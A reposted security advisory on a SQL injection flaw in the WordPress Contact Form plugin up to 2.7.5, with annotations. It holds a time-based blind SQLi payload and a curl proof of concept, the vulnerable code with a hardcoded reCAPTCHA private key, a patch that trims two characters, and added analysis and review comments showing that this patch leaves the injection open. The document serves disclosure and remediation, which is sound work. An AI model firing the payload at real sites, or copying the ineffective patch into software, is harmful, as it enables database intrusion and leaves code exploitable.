
WordPress plugin Contact Form <= 2.7.5 SQL injection flaw and fix

Source: Zixue PHP (自学PHP网)    Time: 2015-04-17 14:47    Author:    Reads:


Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability

Author: Skraps (jackie.craig.sparks(at)live.com www.2cto.com jackie.craig.sparks(at)gmail.com @skraps_foo)

Download: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip

Tested version: 2.7.5

---------------
PoC (POST data)
---------------

http://www.2cto.com /wp-content/plugins/contact-form-wordpress/easy-form.class.php

wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)

The payload is a time-based blind probe: BENCHMARK() makes MySQL compute 500,000,000 MD5 hashes, so a vulnerable site answers noticeably later than it does for wpcf_easyform_formid=1 on its own (CHAR(115,113,108,109,97,112) is simply the string "sqlmap"). The vulnerable code runs inside the plugin's the_content filter, which is a WordPress hook, so the POST is sent to a page that renders post content; that is why the example below targets ?p=1 rather than requesting the class file directly.

Example

curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1

---------------
Code analysis
---------------

Line 49:

    public function the_content($content) {
        global $wpdb;
        global $table_name;
        global $settings_table_name;

        $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

        if ($_POST['wpcf_easyform_submitted'] == 1) {

            // $_POST['wpcf_easyform_formid'] is concatenated straight into the
            // SQL with no validation, casting or escaping: this is the injection
            // point the PoC above drives with the BENCHMARK() payload.
            $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

The same POST value is concatenated a second time further down (the form_id query against $settings_table_name shown in the patch below), so both queries are reachable from one request.
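To make the point of the code analysis concrete, and to show why trimming the value (as the substr() line in the patch further down does) does not close the hole, here is an added Python model; it is not code from the advisory or the plugin. It rebuilds the plugin's query string under three treatments of wpcf_easyform_formid (used as-is, as in 2.7.5; PHP substr($id, 2), as in the patch; an integer cast, as absint()/intval() would do) and checks which of them leave anything but a plain number after "WHERE ID =". The table name and helper names are assumptions made for the illustration.

```python
import re

# Constructed stand-in for the plugin's $table_name (assumed, not the real name).
TABLE_NAME = "wp_contact_form_wordpress"

# The PoC's POST value for wpcf_easyform_formid, verbatim from the advisory.
POC_PAYLOAD = ("1 AND 1=IF(2>1,BENCHMARK(500000000,"
               "MD5(CHAR(115,113,108,109,97,112))),0)")


def as_is(formid: str) -> str:
    """2.7.5 behaviour: the POST value is used untouched."""
    return formid


def substr2(formid: str) -> str:
    """Mirror of PHP substr($formid, 2) from the patch: drop two characters."""
    return formid[2:]


def to_int(formid: str) -> str:
    """Mirror of PHP absint()/intval(): leading integer, otherwise 0."""
    m = re.match(r"\s*[+-]?\d+", formid)
    return str(abs(int(m.group()))) if m else "0"


def build_query(formid: str, handler) -> str:
    """Rebuild the concatenation from easy-form.class.php with a given handler."""
    return f"SELECT * FROM {TABLE_NAME} WHERE ID = " + handler(formid)


def id_part_is_numeric(query: str) -> bool:
    """True only if what follows 'WHERE ID = ' is a plain integer.

    An empty remainder (a valid id eaten by substr) is a SQL syntax error,
    so it counts as not numeric as well.
    """
    rhs = query.split("WHERE ID = ", 1)[1]
    return rhs.isdigit()


def compare_handlers(formid: str) -> dict:
    """Query text and a safe/unsafe verdict for each handler on one POST value."""
    result = {}
    for name, handler in (("as_is", as_is), ("substr2", substr2), ("to_int", to_int)):
        query = build_query(formid, handler)
        result[name] = (query, id_part_is_numeric(query))
    return result


if __name__ == "__main__":
    # A legitimate id, the PoC payload, and the PoC payload with two filler
    # characters in front (which is exactly what substr(...,2) strips off).
    for value in ("1", POC_PAYLOAD, "xx" + POC_PAYLOAD):
        print(f"POST value: {value[:40]!r}")
        for name, (query, safe) in compare_handlers(value).items():
            print(f"  {name:8s} safe={str(safe):5s} {query[:72]}")
```

Running it shows the three outcomes side by side: with no handling the PoC payload lands in the query unchanged; with the substr() treatment a two-character prefix ("xx1 AND ...") restores the original payload exactly while a legitimate "1" is reduced to an empty string and breaks the query; with an integer cast every variant collapses to a bare number.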

---------------
Patch
---------------


*** ./easy-form.class.php.orig  2011-10-13 19:53:05.674800956 -0400

--- ./easy-form.class.php   2011-10-13 19:51:21.442799615 -0400

***************

*** 54,61 ****

          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

          

          if ($_POST['wpcf_easyform_submitted'] == 1) {

!       

!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

              

              $continue = true;

              

--- 54,63 ----

          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

          

          if ($_POST['wpcf_easyform_submitted'] == 1) {

!               $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];

!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);

!           

!   $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);

              

              $continue = true;

              
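Review bot: substr($wpcf_easyform_formid,2) in this hunk is not input validation, it only discards the first two characters, so the concatenated query stays injectable: a POST value of "xx1 AND 1=IF(...)" reaches the query as "1 AND 1=IF(...)", while a legitimate wpcf_easyform_formid=1 becomes an empty string and leaves "WHERE ID = " as a syntax error. Cast the id to an integer and bind it instead, for example `$wpcf_easyform_formid = absint($_POST['wpcf_easyform_formid']);` followed by `$form = $wpdb->get_results($wpdb->prepare("SELECT * FROM $table_name WHERE ID = %d", $wpcf_easyform_formid));`, and wrap the block in an isset() check so a request without the field does not raise a notice. The two "!" lines that contain only whitespace are noise in the patch and should be dropped before it is submitted.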

***************

*** 71,80 ****

              if ($continue) {

              

                  //loop through the fields of this form (read from DB) and build the message here

!                 $form_fields = $wpdb->get_results("

                    SELECT *

                    FROM $settings_table_name

!                   WHERE form_id = ".$_POST['wpcf_easyform_formid']."

                    ORDER BY position

                ");

                

--- 73,82 ----

              if ($continue) {

              

                  //loop through the fields of this form (read from DB) and build the message here

!       $form_fields = $wpdb->get_results("

                    SELECT *

                    FROM $settings_table_name

!                   WHERE form_id = ".$wpcf_easyform_formid."

                    ORDER BY position

                ");

               
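Review bot: the form_id query in this hunk still concatenates $wpcf_easyform_formid, which after the substr() in the previous hunk is unvalidated request data, so the second query is injectable in exactly the same way as the first. Once the id is cast to an integer, build this statement with `$wpdb->prepare("SELECT * FROM $settings_table_name WHERE form_id = %d ORDER BY position", $wpcf_easyform_formid)` rather than string concatenation; $settings_table_name may stay interpolated only because it is set by the plugin and not by the request.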
